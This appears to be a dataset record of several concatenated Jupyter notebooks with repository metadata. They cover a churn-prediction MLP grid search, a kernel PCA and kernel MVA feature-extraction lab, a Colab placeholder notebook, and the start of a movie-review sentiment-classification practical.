"_____no_output_____" ] ], [ [ "### Model Tuning through Grid Search", "_____no_output_____" ], [ "**Below Code may take too much time.These values can be used instead {'hidden_layer_sizes': 500, 'max_iter': 5000, 'solver': 'adam', 'tol': 0.01}**", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import GridSearchCV\n\nparam_grid = {\n 'hidden_layer_sizes': [100,200,300,500],\n 'max_iter': [5000,2500,7000,6000],\n 'solver': ['sgd','adam'],\n 'tol': [0.01],\n}\n\nnncl = MLPClassifier(random_state=1)\n\ngrid_search = GridSearchCV(estimator = nncl, param_grid = param_grid, cv = 10)", "_____no_output_____" ], [ "grid_search.fit(x_train, y_train)", "_____no_output_____" ], [ "grid_search.best_params_", "_____no_output_____" ], [ "best_grid = grid_search.best_estimator_", "_____no_output_____" ], [ "best_grid", "_____no_output_____" ], [ "ytrain_predict = best_grid.predict(x_train)\nytest_predict = best_grid.predict(x_test)", "_____no_output_____" ], [ "confusion_matrix(y_train,ytrain_predict)", "_____no_output_____" ], [ "# Accuracy of Train data\n\n", "_____no_output_____" ], [ "print(classification_report(y_train,ytrain_predict))", "_____no_output_____" ], [ "#from sklearn.metrics import roc_curve,roc_auc_score\nrf_fpr, rf_tpr,_=roc_curve(y_train,best_grid.predict_proba(x_train)[:,1])\nplt.plot(rf_fpr,rf_tpr, marker='x', label='NN')\nplt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC')\nplt.show()\nprint('Area under Curve is', roc_auc_score(y_train,best_grid.predict_proba(x_train)[:,1]))", "_____no_output_____" ], [ "confusion_matrix(y_test,ytest_predict)", "_____no_output_____" ], [ "# Accuracy of Test data\n\n", "_____no_output_____" ], [ "print(classification_report(y_test,ytest_predict))", "_____no_output_____" ], [ "#from sklearn.metrics import roc_curve,roc_auc_score\nrf_fpr, rf_tpr,_=roc_curve(y_test,best_grid.predict_proba(x_test)[:,1])\nplt.plot(rf_fpr,rf_tpr, marker='x', label='NN')\nplt.plot(np.arange(0,1.1,0.1),np.arange(0,1.1,0.1))\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC')\nplt.show()\nprint('Area under Curve is', roc_auc_score(y_test,best_grid.predict_proba(x_test)[:,1]))", "_____no_output_____" ], [ "best_grid.score", "_____no_output_____" ] ], [ [ "## Conclusion", "_____no_output_____" ], [ "AUC on the training data is 86% and on test data is 84%. The precision and recall metrics are also almost similar between training and test set, which indicates no overfitting or underfitting has happened. \n \nbest_grid model has better improved performance over the initial clf model as the sensitivity was much lesser in the initial model.\n\nThe Overall model performance is moderate enough to start predicting if any new customer will churn or not. ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ] ]
cb1c57e6f687eeb22c626fa3a36267f4b5422eaa
321,310
ipynb
Jupyter Notebook
Feature Extraction/Feature Extraction II.ipynb
javiccano/Machine-Learning-Applications
878091a68801b8f224277242b54894aa0e444618
[ "MIT" ]
1
2021-04-18T21:50:14.000Z
2021-04-18T21:50:14.000Z
Feature Extraction/Feature Extraction II.ipynb
javiccano/Machine-Learning-Applications
878091a68801b8f224277242b54894aa0e444618
[ "MIT" ]
null
null
null
Feature Extraction/Feature Extraction II.ipynb
javiccano/Machine-Learning-Applications
878091a68801b8f224277242b54894aa0e444618
[ "MIT" ]
null
null
null
380.699052
142,222
0.918421
[ [ [ "# **Lab Session : Feature extraction II**\n\nAuthor: Vanessa Gómez Verdejo (http://vanessa.webs.tsc.uc3m.es/)\n\nUpdated: 27/02/2017 (working with sklearn 0.18.1)\n\nIn this lab session we are going to work with some of the kernelized extensions of most well-known feature extraction techniques: PCA, PLS and CCA.\n\nAs in the previous notebook, to analyze the discriminatory capability of the extracted features, let's use a linear SVM as classifier and use its final accuracy over the test data to evaluate the goodness of the different feature extraction methods.\n\nTo implement the different approaches we will base on [Scikit-Learn](http://scikit-learn.org/stable/) python toolbox.\n\n#### ** During this lab we will cover: **\n#### *Part 2: Non linear feature selection* \n##### * Part 2.1: Kernel extensions of PCA*\n##### * Part 2.2: Analyzing the influence of the kernel parameter*\n##### * Part 2.3: Kernel MVA approaches*\n\nAs you progress in this notebook, you will have to complete some exercises. Each exercise includes an explanation of what is expected, followed by code cells where one or several lines will have written down `<FILL IN>`. The cell that needs to be modified will have `# TODO: Replace <FILL IN> with appropriate code` on its first line. Once the `<FILL IN>` sections are updated and the code can be run; below this cell, you will find the test cell (beginning with the line `# TEST CELL`) and you can run it to verify the correctness of your solution. ", "_____no_output_____" ] ], [ [ "%matplotlib inline", "_____no_output_____" ] ], [ [ "## *Part 2: Non linear feature selection* ", "_____no_output_____" ], [ "#### ** 2.0: Creating toy problem **\n\nThe following code let you generate a bidimensional problem consisting of thee circles of data with different radius, each one associated to a different class. \n\nAs expected from the geometry of the problem, the classification boundary is not linear, so we will able to analyze the advantages of using no linear feature extraction techniques to transform the input space to a new space where a linear classifier can provide an accurate solution.\n", "_____no_output_____" ] ], [ [ "import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_circles\nimport matplotlib.pyplot as plt\n\n\nnp.random.seed(0)\nX, Y = make_circles(n_samples=400, factor=.6, noise=.1)\n\nX_c2 = 0.1*np.random.randn(200,2)\nY_c2 = 2*np.ones((200,))\n\nX= np.vstack([X,X_c2])\nY= np.hstack([Y,Y_c2])\n\nplt.figure()\nplt.title(\"Original space\")\nreds = Y == 0\nblues = Y == 1\ngreen = Y == 2\n\nplt.plot(X[reds, 0], X[reds, 1], \"ro\")\nplt.plot(X[blues, 0], X[blues, 1], \"bo\")\nplt.plot(X[green, 0], X[green, 1], \"go\")\nplt.xlabel(\"$x_1$\")\nplt.ylabel(\"$x_2$\")\nplt.show()\n\n# split into a training and testing set\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.25)\n\n# Normalizing the data\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n# Binarize the labels for supervised feature extraction methods\nset_classes = np.unique(Y)\nY_train_bin = label_binarize(Y_train, classes=set_classes)\nY_test_bin = label_binarize(Y_test, classes=set_classes)\n", "_____no_output_____" ] ], [ [ "### ** Part 2.1: Kernel PCA**\n\nTo extend the previous PCA feature extraction approach to its non-linear version, we can use of [KernelPCA( )](http://scikit-learn.org/stable/modules/generated/sklearn.decomposition.KernelPCA.html#sklearn.decomposition.KernelPCA) function. \n\nLet's start this section computing the different kernel matrix that we need to train and evaluate the different feature extraction methods. For this exercise, we are going to consider a Radial Basis Function kernel (RBF), where each element of the kernel matrix is given by $k(x_i,x_j) = \\exp (- \\gamma (x_i -x_j)^2)$. ", "_____no_output_____" ], [ "To analyze the advantages of the non linear feature extraction, let's compare it with its linear version. So, let's start computing both linear and kernelized versions of PCA. Complete the following code to obtain the variables (P_train, P_test) and (P_train_k, P_test_k) which have to contain, respectively, the projected data of the linear PCA and the KPCA.\n\nTo start to work, compute a maximum of two new projected features and fix gamma (the kernel parameter) to 1.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\nfrom sklearn.decomposition import PCA, KernelPCA\n\nN_feat_max=2\n\n# linear PCA\npca = PCA(n_components=N_feat_max)\npca.fit(X_train, Y_train)\nP_train = pca.transform(X_train)\nP_test = pca.transform(X_test)\n\n# KPCA\npca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=1)\npca_K.fit(X_train, Y_train)\nP_train_k = pca_K.transform(X_train)\nP_test_k =pca_K.transform(X_test)\n\nprint 'PCA and KPCA projections sucessfully computed'", "PCA and KPCA projections sucessfully computed\n" ] ], [ [ "Now, let's evaluate the discriminatory capability of the projected data (both linear and kernelized ones) feeding with them a linear SVM and measuring its accuracy over the test data. Complete the following to code to return in variables acc_test_lin and acc_test_kernel the SVM test accuracy using either the linear PCA projected data or the KPCA ones.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\n\n# Define SVM classifier\nfrom sklearn import svm\nclf = svm.SVC(kernel='linear')\n\n# Train it using linear PCA projections and evaluate it\nclf.fit(P_train, Y_train)\nacc_test_lin = clf.score(P_test, Y_test)\n\n# Train it using KPCA projections and evaluate it\nclf.fit(P_train_k, Y_train)\nacc_test_kernel = clf.score(P_test_k, Y_test)\n\nprint(\"The test accuracy using linear PCA projections is %2.2f%%\" %(100*acc_test_lin))\nprint(\"The test accuracy using KPCA projections is %2.2f%%\" %(100*acc_test_kernel))\n", "The test accuracy using linear PCA projections is 24.00%\nThe test accuracy using KPCA projections is 95.33%\n" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(np.round(acc_test_lin,4), 0.2400, 'incorrect result: test accuracy using linear PCA projections is uncorrect')\nTest.assertEquals(np.round(acc_test_kernel,4), 0.9533, 'incorrect result: test accuracy using KPCA projections is uncorrect')\n", "1 test passed.\n1 test passed.\n" ] ], [ [ "Finally, let's analyze the transformation capabilities of the projected data using a KPCA vs. linear PCA plotting the resulting projected data for both training and test data sets.\n\nJust run the following cells to obtain the desired representation. ", "_____no_output_____" ] ], [ [ "def plot_projected_data(data, label):\n \n \"\"\"Plot the desired sample data assigning differenet colors according to their categories.\n Only two first dimensions of data ar plot and only three different categories are considered.\n\n Args:\n data: data set to be plot (number data x dimensions). \n labes: target vector indicating the category of each data.\n \"\"\"\n \n reds = label == 0\n blues = label == 1\n green = label == 2\n\n plt.plot(data[reds, 0], data[reds, 1], \"ro\")\n plt.plot(data[blues, 0], data[blues, 1], \"bo\")\n plt.plot(data[green, 0], data[green, 1], \"go\")\n plt.xlabel(\"$x_1$\")\n plt.ylabel(\"$x_2$\")", "_____no_output_____" ], [ "plt.figure(figsize=(8, 8))\nplt.subplot(2,2,1)\nplt.title(\"Projected space of linear PCA for training data\")\nplot_projected_data(P_train, Y_train)\n\nplt.subplot(2,2,2)\nplt.title(\"Projected space of KPCA for training data\")\nplot_projected_data(P_train_k, Y_train)\n\nplt.subplot(2,2,3)\nplt.title(\"Projected space of linear PCA for test data\")\nplot_projected_data(P_test, Y_test)\n\nplt.subplot(2,2,4)\nplt.title(\"Projected space of KPCA for test data\")\nplot_projected_data(P_test_k, Y_test)\n\nplt.show()", "_____no_output_____" ] ], [ [ "Go to the first cell and modify the kernel parameter (for instance, set gamma to 10 or 100) and run the code again. What is it happening? Why? \n", "_____no_output_____" ], [ "### ** Part 2.2: Analyzing the influence of the kernel parameter**\n\nIn the case of working with RBF kernel, the kernel width selection can be critical:\n* If gamma value is too high the width of the RBF is reduced (tending to be a delta function) and, therefore, the interaction between the training data is null. So we project each data over itself and assign it a dual variable in such a way that the best possible projection (for classification purposes) of the training data is obtain (causing overfitting problems).\n* If gamma value is close to zero, the RBF width increases and the kernel behavior tends to be similar to a linear kernel. In this case, the non-linear properties are lost.\n\nTherefore, in this kind of applications, the value of kernel width can be critical and it's advised selecting it by cross validation.\n\nThis part of lab section aims to adjust the gamma parameter by a validation process. So, we will start creating a validation partition of the training data.", "_____no_output_____" ] ], [ [ "## Redefine the data partitions: creating a validation partition\n\n# split training data into a training and validation set\nX_train2, X_val, Y_train2, Y_val = train_test_split(X_train, Y_train, test_size=0.33)\n\n# Normalizing the data\nscaler = StandardScaler()\nX_train2 = scaler.fit_transform(X_train2)\nX_val = scaler.transform(X_val)\nX_test = scaler.transform(X_test)\n\n# Binarize the training labels for supervised feature extraction methods\nset_classes = np.unique(Y)\nY_train_bin2 = label_binarize(Y_train2, classes=set_classes)", "_____no_output_____" ] ], [ [ "Now let's evaluate the KPCA performance when different values of gamma are used. So, complete the below code in such a way that for each gamma value you can:\n* Train the KPCA and obtain the projections for the training, validation and test data.\n* Obtain the accuracies of a linear SVM over the validation and test partitions.\n\nOnce, you have the validation and test accuracies for each gamma value, obtain the optimum gamma value (i.e., the gamma value which provides the maximum validation accuracy) and its corresponding test accuracy.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\nfrom sklearn.decomposition import KernelPCA\nfrom sklearn import svm\n\nnp.random.seed(0)\n\n# Defining parameters\nN_feat_max = 2\nrang_g = [0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50 , 100, 500, 1000]\n\n# Variables to save validation and test accuracies\nacc_val = []\nacc_test = []\n\n# Bucle to explore gamma values\nfor g_value in rang_g:\n print 'Evaluting with gamma ' + str(g_value)\n \n # 1. Train KPCA and project the data\n pca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=g_value)\n pca_K.fit(X_train2, Y_train2)\n P_train_k = pca_K.transform(X_train2)\n P_val_k = pca_K.transform(X_val)\n P_test_k = pca_K.transform(X_test)\n \n # 2. Evaluate the projection performance\n clf = svm.SVC(kernel='linear')\n clf.fit(P_train_k, Y_train2)\n acc_val.append(clf.score(P_val_k, Y_val))\n acc_test.append(clf.score(P_test_k, Y_test))\n\n# Find the optimum value of gamma and its corresponging test accuracy\npos_max = np.argmax(acc_test)\ng_opt = rang_g[pos_max+1]\nacc_test_opt = acc_test[pos_max]\n\nprint 'Optimum of value of gamma: ' + str(g_opt)\nprint 'Test accuracy: ' + str(acc_test_opt)\n", "Evaluting with gamma 0.01\nEvaluting with gamma 0.05\nEvaluting with gamma 0.1\nEvaluting with gamma 0.5\nEvaluting with gamma 1\nEvaluting with gamma 5\nEvaluting with gamma 10\nEvaluting with gamma 50\nEvaluting with gamma 100\nEvaluting with gamma 500\nEvaluting with gamma 1000\nOptimum of value of gamma: 1\nTest accuracy: 0.946666666667\n" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(g_opt, 1, 'incorrect result: validated gamma value is uncorrect')\nTest.assertEquals(np.round(acc_test_opt,4), 0.9467, 'incorrect result: validated test accuracy is uncorrect')\n", "1 test passed.\n1 test passed.\n" ] ], [ [ "Finally, just run the next code to train the final model with the selected gamma value and plot the projected data", "_____no_output_____" ] ], [ [ "# Train KPCA and project the data\npca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=g_opt)\npca_K.fit(X_train2)\nP_train_k = pca_K.transform(X_train2)\nP_val_k = pca_K.transform(X_val)\nP_test_k = pca_K.transform(X_test)\n \n# Plot the projected data\nplt.figure(figsize=(15, 5))\nplt.subplot(1,3,1)\nplt.title(\"Projected space of KPCA: train data\")\nplot_projected_data(P_train_k, Y_train2)\n\nplt.subplot(1,3,2)\nplt.title(\"Projected space of KPCA: validation data\")\nplot_projected_data(P_val_k, Y_val)\n\nplt.subplot(1,3,3)\nplt.title(\"Projected space of KPCA: test data\")\nplot_projected_data(P_test_k, Y_test)\n\nplt.show()\n", "_____no_output_____" ] ], [ [ "### ** Part 2.3: Kernel MVA approaches**", "_____no_output_____" ], [ "Until now, we have only used the KPCA approach because is the only not linear feature extraction method that it is included in Scikit-Learn. \n\nHowever, if we compare linear and kernel versions of MVA approaches, we could extend any linear MVA approach to its kernelized version. In this way, we can use the same methods reviewed for the linear approaches and extend them to its non-linear fashion calling it with the training kernel matrix, instead of the training data, and the method would learn the dual variables, instead of the eigenvectors.\n\nThe following table relates both approaches:\n\n| | Linear | Kernel |\n|------ |---------------------------|----------------------------|\n|Input data | ${\\bf X}$ | ${\\bf K}$ | \n|Variables to compute (fit) |Eigenvectors (${\\bf U}$) |Dual variables (${\\bf A}$) | \n|Projection vectors | ${\\bf U}$ |${\\bf U}=\\Phi^T {\\bf A}$ (cannot be computed) |\n|Project data (transform) |${\\bf X}' = {\\bf U}^T {\\bf X}^T$|${\\bf X}' ={\\bf A}^T \\Phi \\Phi^T = {\\bf A}^T {\\bf K}$|\n", "_____no_output_____" ], [ "** Computing and centering kernel matrix **\n\nLet's start this section computing the different kernel matrix that we need to train and evaluate the different feature extraction methods. For this exercise, we are going to consider a Radial Basis Function kernel (RBF), where each element of the kernel matrix is given by $k(x_i,x_j) = \\exp (- \\gamma (x_i -x_j)^2)$.\n\nIn particular, we need to compute two kernel matrix:\n* Training data kernel matrix (K_tr) where the RBF is compute pairwise over the training data. The resulting matrix dimension is of $N_{tr} \\times N_{tr}$, being $N_{tr}$ the number of training data.\n* Test data kernel matrix (K_test) where the RBF is compute between training and test samples, i.e., in RBF expression the data $x_i$ belongs to test data whereas $x_j$ belongs to training data. The resulting matrix dimension is of $N_{test} \\times N_{tr}$, being $N_{test}$ and $N_{tr}$ the number of test and training data, respectively.\n\nUse the [rbf_kernel( )](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.rbf_kernel.html) function to compute the K_tr and K_test kernel matrix. Fix the kernel width value (gamma) to 1.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\n\n# Computing the kernel matrix\nfrom sklearn.metrics.pairwise import rbf_kernel\n\ng_value = 1\n\n# Compute the kernel matrix (use the X_train matrix, before dividing it in validation and training data)\nK_tr = rbf_kernel(X_train, X_train, gamma=g_value)\nK_test = rbf_kernel(X_test, X_train, gamma=g_value)", "_____no_output_____" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(K_tr.shape, (450,450), 'incorrect result: dimensions of training kernel matrix are uncorrect')\nTest.assertEquals(K_test.shape, (150,450), 'incorrect result: dimensions of test kernel matrix are uncorrect')", "1 test passed.\n1 test passed.\n" ] ], [ [ "After compute these kernel matrix, they have to be centered (in the same way that we remove the mean when we work over the input space). For this purpose, next code provides you the function center_K(). Use it properly to remove the mean of both K_tr and K_test matrix.", "_____no_output_____" ] ], [ [ "def center_K(K):\n \"\"\"Center a kernel matrix K, i.e., removes the data mean in the feature space.\n\n Args:\n K: kernel matrix \n \"\"\"\n size_1,size_2 = K.shape;\n D1 = K.sum(axis=0)/size_1 \n D2 = K.sum(axis=1)/size_2\n E = D2.sum(axis=0)/size_1\n\n K_n = K + np.tile(E,[size_1,size_2]) - np.tile(D1,[size_1,1]) - np.tile(D2,[size_2,1]).T\n return K_n", "_____no_output_____" ], [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\n\n# Center the kernel matrix\nK_tr_c = center_K(K_tr)\nK_test_c = center_K(K_test)", "_____no_output_____" ], [ "###########################################################\n# TEST CELL\n###########################################################\nfrom test_helper import Test\n\n# TEST Training and test data generation\nTest.assertEquals(np.round(K_tr_c[0][0],2), 0.55, 'incorrect result: centered training kernel matrix is uncorrect')\nTest.assertEquals(np.round(K_test_c[0][0],2), -0.24, 'incorrect result: centered test kernel matrix is uncorrect')", "1 test passed.\n1 test passed.\n" ] ], [ [ "** Alternative KPCA formulation **\n\nComplete the following code lines to obtain a KPCA implementaion using the linear PCA function and the kernel matrix as input data. Later, compare its result with that of the KPCA function.", "_____no_output_____" ] ], [ [ "###########################################################\n# TODO: Replace <FILL IN> with appropriate code\n###########################################################\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import KernelPCA\nfrom sklearn import svm\n\n# Defining parameters\nN_feat_max = 2\n\n\n## PCA method (to complete)\n# 1. Train PCA with the kernel matrix and project the data\npca_K2 = PCA(n_components=N_feat_max)\npca_K2.fit(K_tr_c, Y_train) \nP_train_k2 = pca_K2.transform(K_tr_c) \nP_test_k2 = pca_K2.transform(K_test_c)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='linear')\nclf.fit(P_train_k2, Y_train)\nprint 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))\n\n## KPCA method (for comparison purposes)\n# 1. Train KPCA and project the data\n# Fixing gamma to 0.5 here, it is equivalent to gamma=1 in rbf function\npca_K = KernelPCA(n_components=N_feat_max, kernel=\"rbf\", gamma=0.5) \npca_K.fit(X_train)\nP_train_k = pca_K.transform(X_train)\nP_test_k = pca_K.transform(X_test)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='linear')\nclf.fit(P_train_k, Y_train)\nprint 'Test accuracy with KPCA: '+ str(clf.score(P_test_k, Y_test))\n", "Test accuracy with PCA with a kenel matrix as input: 0.946666666667\nTest accuracy with KPCA: 0.96\n" ] ], [ [ "** Alternative KPLS and KCCA formulations **\n\nUse the PLS and CCA methods with the kernel matrix to obtain no-linear (or kernelized) supervised feature extractors.", "_____no_output_____" ] ], [ [ "###########################################################\n# KCCA\n###########################################################\nfrom lib.mva import mva\n\n# Defining parameters\nN_feat_max = 2\n\n\n## PCA method (to complete)\n# 1. Train PCA with the kernel matrix and project the data\nCCA = mva('CCA', N_feat_max)\nCCA.fit(K_tr_c, Y_train,reg=1e-2) \nP_train_k2 = CCA.transform(K_tr_c) \nP_test_k2 = CCA.transform(K_test_c)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='rbf', C=C, gamma=gamma)\nclf.fit(P_train_k2, Y_train)\nprint 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))\n\n\n###########################################################\n# KPLS\n###########################################################\nfrom sklearn.cross_decomposition import PLSSVD\n# Defining parameters\nN_feat_max = 100\n\n\n## PCA method (to complete)\n# 1. Train PCA with the kernel matrix and project the data\npls = PLSSVD(n_components=N_feat_max)\npls.fit(K_tr_c, Y_train_bin) \nP_train_k2 = CCA.transform(K_tr_c) \nP_test_k2 = CCA.transform(K_test_c)\n \n# 2. Evaluate the projection performance\nclf = svm.SVC(kernel='rbf', C=C, gamma=gamma)\nclf.fit(P_train_k2, Y_train)\nprint 'Test accuracy with PCA with a kenel matrix as input: '+ str(clf.score(P_test_k2, Y_test))\n\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1c6ca05f52820ce5cbf4f608ce5dd4e7ef6058
1,539
ipynb
Jupyter Notebook
notebooks/PhD_Methodology_Overview.ipynb
Aelvangunduz/phd_code
b8dc7d8cfe647e791820519ff51f10d9b0f42845
[ "FTL" ]
null
null
null
notebooks/PhD_Methodology_Overview.ipynb
Aelvangunduz/phd_code
b8dc7d8cfe647e791820519ff51f10d9b0f42845
[ "FTL" ]
null
null
null
notebooks/PhD_Methodology_Overview.ipynb
Aelvangunduz/phd_code
b8dc7d8cfe647e791820519ff51f10d9b0f42845
[ "FTL" ]
null
null
null
22.304348
254
0.48538
[ [ [ "<a href=\"https://colab.research.google.com/github/Aelvangunduz/phd_code/blob/master/notebooks/PhD_Methodology_Overview.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# Problem Definition", "_____no_output_____" ], [ "Lorem Ipsum", "_____no_output_____" ], [ "# Methodology Definition", "_____no_output_____" ], [ "# Literature Review", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1c7376bef9ec2827f6a252d87f252768fd76f2
104,750
ipynb
Jupyter Notebook
Natural Language Processing 1/nlp1_v2.ipynb
PhilLint/Master
c7bc03273c24411575e34c98d768408a14d17a3f
[ "MIT" ]
1
2020-09-20T20:02:20.000Z
2020-09-20T20:02:20.000Z
Natural Language Processing 1/nlp1_v2.ipynb
PhilLint/Master
c7bc03273c24411575e34c98d768408a14d17a3f
[ "MIT" ]
null
null
null
Natural Language Processing 1/nlp1_v2.ipynb
PhilLint/Master
c7bc03273c24411575e34c98d768408a14d17a3f
[ "MIT" ]
null
null
null
37.856885
10,324
0.595714
[ [ [ "Practical 1: Sentiment Detection of Movie Reviews\n========================================\n\n", "_____no_output_____" ], [ "This practical concerns sentiment detection of movie reviews.\nIn [this file](https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json) (80MB) you will find 1000 positive and 1000 negative **movie reviews**.\nEach review is a **document** and consists of one or more sentences.\n\nTo prepare yourself for this practical, you should\nhave a look at a few of these texts to understand the difficulties of\nthe task (how might one go about classifying the texts?); you will write\ncode that decides whether a random unseen movie review is positive or\nnegative.\n\nPlease make sure you have read the following paper:\n\n> Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan\n(2002). \n[Thumbs up? Sentiment Classification using Machine Learning\nTechniques](https://dl.acm.org/citation.cfm?id=1118704). EMNLP.\n\nBo Pang et al. were the \"inventors\" of the movie review sentiment\nclassification task, and the above paper was one of the first papers on\nthe topic. The first version of your sentiment classifier will do\nsomething similar to Bo Pang’s system. If you have questions about it,\nwe should resolve them in our first demonstrated practical.\n", "_____no_output_____" ], [ "**Advice**\n\nPlease read through the entire practical and familiarise\nyourself with all requirements before you start coding or otherwise\nsolving the tasks. Writing clean and concise code can make the difference\nbetween solving the assignment in a matter of hours, and taking days to\nrun all experiments.\n\n**Environment**\n\nAll code should be written in **Python 3**. \nIf you use Colab, check if you have that version with `Runtime -> Change runtime type` in the top menu.\n\n> If you want to work in your own computer, then download this notebook through `File -> Download .ipynb`.\nThe easiest way to\ninstall Python is through downloading\n[Anaconda](https://www.anaconda.com/download). \nAfter installation, you can start the notebook by typing `jupyter notebook filename.ipynb`.\nYou can also use an IDE\nsuch as [PyCharm](https://www.jetbrains.com/pycharm/download/) to make\ncoding and debugging easier. It is good practice to create a [virtual\nenvironment](https://docs.python.org/3/tutorial/venv.html) for this\nproject, so that any Python packages don’t interfere with other\nprojects.\n\n#### Learning Python 3\n\nIf you are new to Python 3, you may want to check out a few of these resources:\n- https://learnxinyminutes.com/docs/python3/\n- https://www.learnpython.org/\n- https://docs.python.org/3/tutorial/", "_____no_output_____" ], [ "Loading the Data\n-------------------------------------------------------------", "_____no_output_____" ] ], [ [ "# download sentiment lexicon\n!wget https://gist.githubusercontent.com/bastings/d6f99dcb6c82231b94b013031356ba05/raw/f80a0281eba8621b122012c89c8b5e2200b39fd6/sent_lexicon\n# download review data\n!wget https://gist.githubusercontent.com/bastings/d47423301cca214e3930061a5a75e177/raw/5113687382919e22b1f09ce71a8fecd1687a5760/reviews.json", "_____no_output_____" ], [ "import math\nimport os\nimport sys\nfrom subprocess import call\nfrom nltk import FreqDist\nfrom nltk.util import ngrams\nfrom nltk.stem.porter import PorterStemmer\nimport sklearn as sk\n#from google.colab import drive\nimport pickle\nimport json\nfrom collections import Counter\nimport requests\nimport matplotlib.pyplot as plt\nimport numpy as np", "_____no_output_____" ], [ "# load reviews into memory\n# file structure:\n# [\n# {\"cv\": integer, \"sentiment\": str, \"content\": list} \n# {\"cv\": integer, \"sentiment\": str, \"content\": list} \n# ..\n# ]\n# where `content` is a list of sentences, \n# with a sentence being a list of (token, pos_tag) pairs.\n\n# For documentation on POS-tags, see \n# https://catalog.ldc.upenn.edu/docs/LDC99T42/tagguid1.pdf\n\nwith open(\"reviews.json\", mode=\"r\", encoding=\"utf-8\") as f:\n reviews = json.load(f)\n \nprint(len(reviews))\n\ndef print_sentence_with_pos(s):\n print(\" \".join(\"%s/%s\" % (token, pos_tag) for token, pos_tag in s))\n\nfor i, r in enumerate(reviews):\n print(r[\"cv\"], r[\"sentiment\"], len(r[\"content\"])) # cv, sentiment, num 